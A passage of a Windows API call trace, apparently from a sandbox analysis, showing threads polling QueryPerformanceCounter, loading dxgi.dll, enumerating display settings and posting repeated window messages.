lpPerformanceCount=0x698ff30*=3100629570471) returned 1 [0187.477] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0187.532] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100635141806) returned 1 [0187.533] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0187.546] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100636517675) returned 1 [0187.546] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xe) returned 0x102 [0187.582] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100640085179) returned 1 [0187.583] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0187.810] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0187.810] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0187.811] GetCurrentThreadId () returned 0x464 Thread: id = 37 os_tid = 0xf14 [0132.058] GetCurrentThreadId () returned 0xf14 [0132.059] GetCurrentThread () returned 0xfffffffe [0132.059] SetThreadPriority (hThread=0xfffffffe, nPriority=15) returned 1 [0132.059] WTSGetActiveConsoleSessionId () returned 0x1 [0132.059] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0132.059] LoadLibraryExA (lpLibFileName="dxgi.dll", hFile=0x0, dwFlags=0x0) returned 0x71e90000 [0132.068] GetProcAddress (hModule=0x71e90000, lpProcName="CreateDXGIFactory") returned 0x71e9fd60 [0132.068] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x6adfcc8 | out: lpflOldProtect=0x6adfcc8*=0x4) returned 1 [0132.068] CreateDXGIFactory () returned 0x0 [0132.221] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x6adfd54 | out: lpDevMode=0x6adfd54) returned 1 [0132.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095104030194) returned 1 [0132.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095105673497) returned 1 [0132.238] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.238] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d3a55e, lParam=0x3d09) returned 1 [0132.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095105714479) returned 1 [0132.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095107259563) returned 1 [0132.254] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.254] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d3e353, lParam=0x3d09) returned 1 [0132.254] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095107299047) returned 1 [0132.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095108828554) returned 1 [0132.269] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.269] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d4209d, lParam=0x3d09) returned 1 [0132.270] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095108868504) returned 1 [0132.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095110406852) returned 1 [0132.285] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.285] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d45e44, lParam=0x3d09) returned 1 [0132.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095110445411) returned 1 [0132.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095115624923) returned 1 [0132.337] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.337] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d52a19, lParam=0x3d09) returned 1 [0132.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095115665500) returned 1 [0132.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095115699094) returned 1 [0132.338] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.338] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d52cfe, lParam=0x3d09) returned 1 [0132.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095115735058) returned 1 [0132.359] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095117804559) returned 1 [0132.359] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.359] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d57f3d, lParam=0x3d09) returned 1 [0132.360] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095117858884) returned 1 [0132.369] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095118851772) returned 1 [0132.370] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.370] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d5a825, lParam=0x3d09) returned 1 [0132.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095118897589) returned 1 [0132.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095120560685) returned 1 [0132.387] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.387] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d5eae6, lParam=0x3d09) returned 1 [0132.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095120604890) returned 1 [0132.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095122062522) returned 1 [0132.402] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.402] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d62591, lParam=0x3d09) returned 1 [0132.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095122105107) returned 1 [0132.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095123663880) returned 1 [0132.418] GetWindowThreadProcessId (in: hWnd=0x103bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0132.418] PostMessageW (hWnd=0x103bc, Msg=0x401, wParam=0x34d6641e, lParam=0x3d09) returned 1 [0132.418] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095123702273) returned 1 [0132.434] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095125256936) returned 1 [0132.434] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095125276041) returned 1 [0132.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095126858652) returned 1 [0132.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095126876345) returned 1 [0132.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095128467069) returned 1 [0132.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095128487816) returned 1 [0132.481] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095130052786) returned 1 [0132.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095130068873) returned 1 [0132.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095131660133) returned 1 [0132.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095131681564) returned 1 [0132.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095133287754) returned 1 [0132.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095133304962) returned 1 [0132.530] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095134919332) returned 1 [0132.530] WTSGetActiveConsoleSessionId () returned 0x1 [0132.531] CreateDXGIFactory () returned 0x0 [0132.532] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x6adfd54 | out: lpDevMode=0x6adfd54) returned 1 [0132.532] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095135094337) returned 1 [0132.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095136464284) returned 1 [0132.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095136484963) returned 1 [0132.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095138058894) returned 1 [0132.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095138074603) returned 1 [0132.577] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095139644953) returned 1 [0132.578] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095139661119) returned 1 [0132.593] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095141211944) returned 1 [0132.593] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095141227905) returned 1 [0132.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095142857962) returned 1 [0132.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095142874667) returned 1 [0132.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095144391477) returned 1 [0132.625] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095144407990) returned 1 [0132.641] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095145960769) returned 1 [0132.641] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095145978999) returned 1 [0132.657] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095147559694) returned 1 [0132.657] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095147577131) returned 1 [0132.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095149157594) returned 1 [0132.673] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095149174218) returned 1 [0132.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095150762191) returned 1 [0132.689] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095150779705) returned 1 [0132.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095152363133) returned 1 [0132.705] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095152386057) returned 1 [0132.721] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095153973088) returned 1 [0132.721] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095153994504) returned 1 [0132.737] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095155558402) returned 1 [0132.737] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095155573532) returned 1 [0132.753] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095157157309) returned 1 [0132.753] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095157172582) returned 1 [0132.768] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095158735907) returned 1 [0132.769] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095158760422) returned 1 [0132.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095160329172) returned 1 [0132.784] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095160344618) returned 1 [0132.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095161924691) returned 1 [0132.800] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095162106933) returned 1 [0132.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095163530123) returned 1 [0132.816] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095163546431) returned 1 [0132.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095165196576) returned 1 [0132.833] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095165220429) returned 1 [0132.848] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095166732715) returned 1 [0132.848] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095166747305) returned 1 [0132.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095168722565) returned 1 [0132.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095168739612) returned 1 [0132.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095170280401) returned 1 [0132.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095170296775) returned 1 [0132.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095171883485) returned 1 [0132.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095171902855) returned 1 [0132.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095173493368) returned 1 [0132.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095173518952) returned 1 [0132.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095175080602) returned 1 [0132.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095175098853) returned 1 [0132.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095176689596) returned 1 [0132.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095176706762) returned 1 [0132.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095178261250) returned 1 [0132.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095178277724) returned 1 [0132.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095179859068) returned 1 [0132.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095179877353) returned 1 [0132.995] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095181406950) returned 1 [0132.995] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095181423362) returned 1 [0133.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095183171424) returned 1 [0133.013] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095183194115) returned 1 [0133.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095184795903) returned 1 [0133.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095184813877) returned 1 [0133.046] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095186504875) returned 1 [0133.046] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095186522093) returned 1 [0133.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095187923422) returned 1 [0133.061] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095187957851) returned 1 [0133.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095189566275) returned 1 [0133.077] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095189591247) returned 1 [0133.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095191117045) returned 1 [0133.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095191141196) returned 1 [0133.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095192726705) returned 1 [0133.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095192748736) returned 1 [0133.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095194307404) returned 1 [0133.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095194323085) returned 1 [0133.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095195909699) returned 1 [0133.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095195925940) returned 1 [0133.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095197510527) returned 1 [0133.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095197526132) returned 1 [0133.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095199109177) returned 1 [0133.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095199131680) returned 1 [0133.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095200819036) returned 1 [0133.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095200843285) returned 1 [0133.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095202359115) returned 1 [0133.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095202374793) returned 1 [0133.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095203964240) returned 1 [0133.221] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095203999273) returned 1 [0133.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095205559316) returned 1 [0133.237] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095205576050) returned 1 [0133.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095207158360) returned 1 [0133.253] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095207175098) returned 1 [0133.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095208758401) returned 1 [0133.269] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095208775032) returned 1 [0133.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095210368169) returned 1 [0133.285] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095210390164) returned 1 [0133.301] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095211965804) returned 1 [0133.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095214795373) returned 1 [0133.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095214825117) returned 1 [0133.329] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095214846418) returned 1 [0133.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095215663105) returned 1 [0133.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095215681980) returned 1 [0133.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095217262745) returned 1 [0133.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095217282109) returned 1 [0133.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095218860448) returned 1 [0133.370] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095218877786) returned 1 [0133.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095220457292) returned 1 [0133.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095220474623) returned 1 [0133.402] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095222152059) returned 1 [0133.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095222168310) returned 1 [0133.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095223758477) returned 1 [0133.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095223775563) returned 1 [0133.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095225358132) returned 1 [0133.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095225374793) returned 1 [0133.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095226956614) returned 1 [0133.451] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095226972929) returned 1 [0133.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095228560697) returned 1 [0133.467] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095228581310) returned 1 [0133.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095230159155) returned 1 [0133.483] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095230176272) returned 1 [0133.499] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095231761263) returned 1 [0133.499] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095231788019) returned 1 [0133.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095233364919) returned 1 [0133.515] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095233401554) returned 1 [0133.530] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095234921517) returned 1 [0133.530] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095234946794) returned 1 [0133.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095236502787) returned 1 [0133.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095236519385) returned 1 [0133.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095238107610) returned 1 [0133.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095238127147) returned 1 [0133.578] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095239674480) returned 1 [0133.578] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095239708859) returned 1 [0133.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095241259928) returned 1 [0133.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095241276730) returned 1 [0133.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095242861417) returned 1 [0133.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095242878334) returned 1 [0133.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | 